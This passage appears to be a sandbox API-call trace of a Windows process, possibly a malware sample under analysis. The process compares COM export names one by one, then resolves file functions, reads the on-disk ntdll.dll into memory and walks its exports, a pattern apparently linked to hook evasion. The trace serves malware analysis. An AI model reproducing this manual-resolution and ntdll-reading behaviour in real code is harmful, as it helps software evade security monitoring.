lpString2="CLIPFORMAT_UserUnmarshalExt") returned 0 [0156.523] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="BindMoniker") returned 1 [0156.523] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree") returned 1 [0156.523] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFree64") returned 1 [0156.523] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0156.523] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0156.524] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0156.524] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0156.524] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize") returned 1 [0156.524] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSize64") returned 1 [0156.524] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0156.524] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0156.524] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0156.524] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0156.524] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromOle1Class") returned 1 [0156.524] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgID") returned 1 [0156.524] lstrcmpA (lpString1="CLSIDFromProgIDEx", lpString2="CLSIDFromProgIDEx") returned 0 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="BindMoniker") returned 1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree") returned -1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFree64") returned -1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize") returned -1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSize64") returned -1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromOle1Class") returned -1 [0156.524] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgID") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromProgIDEx") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CLSIDFromString") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Connect") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0156.525] lstrcmpA (lpString1="CheckInitDde", lpString2="CheckInitDde") returned 0 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="BindMoniker") returned 1 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree") returned -1 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFree64") returned -1 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize") returned -1 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSize64") returned -1 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0156.525] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromOle1Class") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgID") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromProgIDEx") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CLSIDFromString") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Connect") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CheckInitDde") returned 1 [0156.526] lstrcmpA (lpString1="CleanROTForApartment", lpString2="CleanROTForApartment") returned 0 [0156.526] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="BindMoniker") returned 1 [0156.526] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree") returned -1 [0156.526] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFree64") returned -1 [0156.526] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserFreeExt") returned -1 [0156.526] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal") returned -1 [0156.526] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshal64") returned -1 [0156.526] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserMarshalExt") returned -1 [0156.526] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize") returned -1 [0156.526] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSize64") returned -1 [0156.526] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserSizeExt") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshal64") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLIPFORMAT_UserUnmarshalExt") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromOle1Class") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgID") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromProgIDEx") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CLSIDFromString") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Connect") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CheckInitDde") returned 1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="CleanROTForApartment") returned 1 [0156.527] lstrcmpA (lpString1="ClipboardProcessUninitialize", lpString2="ClipboardProcessUninitialize") returned 0 [0156.527] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="BindMoniker") returned 1 [0156.527] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree") returned 1 [0156.527] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFree64") returned 1 [0156.527] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0156.527] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize") returned 1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSize64") returned 1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromOle1Class") returned 1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgID") returned 1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromProgIDEx") returned 1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CLSIDFromString") returned 1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Connect") returned -1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0156.528] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0156.529] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0156.529] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CheckInitDde") returned 1 [0156.529] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CleanROTForApartment") returned 1 [0156.529] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="ClipboardProcessUninitialize") returned 1 [0156.529] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAddRefServerProcess") returned 1 [0156.529] lstrcmpA (lpString1="CoAicGetTokenForCOM", lpString2="CoAicGetTokenForCOM") returned 0 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="BindMoniker") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFree64") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSize64") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromOle1Class") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgID") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromProgIDEx") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CLSIDFromString") returned 1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0156.529] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0156.530] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Connect") returned -1 [0156.530] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0156.530] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0156.530] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0156.530] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CheckInitDde") returned 1 [0156.530] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CleanROTForApartment") returned 1 [0156.530] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="ClipboardProcessUninitialize") returned 1 [0156.530] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAddRefServerProcess") returned 1 [0156.530] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAicGetTokenForCOM") returned 1 [0156.530] lstrcmpA (lpString1="CoAllowSetForegroundWindow", lpString2="CoAllowSetForegroundWindow") returned 0 [0156.530] lstrcmpA (lpString1="CoBuildVersion", lpString2="BindMoniker") returned 1 [0156.530] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree") returned 1 [0156.530] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFree64") returned 1 [0156.530] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0156.530] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize") returned 1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSize64") returned 1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserSizeExt") returned 1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal") returned 1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0156.531] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0156.549] GetProcessHeap () returned 0x450000 [0156.550] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4101040 | out: hHeap=0x450000) returned 1 [0156.629] GetProcessHeap () returned 0x450000 [0156.630] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4690c0 [0156.630] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0156.630] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0156.630] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0156.630] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0156.630] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0156.631] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0156.631] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0156.631] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0156.631] GetProcessHeap () returned 0x450000 [0156.631] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1bba48) returned 0x410c040 [0156.636] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0156.636] ReadFile (in: hFile=0x140, lpBuffer=0x410c040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x410c040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0156.726] CloseHandle (hObject=0x140) returned 1 [0156.726] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0156.727] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0156.727] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0156.727] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0156.727] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0156.727] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0156.727] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0156.727] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0156.727] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0156.727] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0156.727] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0156.727] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0156.727] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0156.727] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.727] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0156.727] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0156.727] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0156.727] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0156.727] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.727] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.727] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0156.727] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0156.727] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0156.727] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0156.727] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0156.727] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0156.727] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 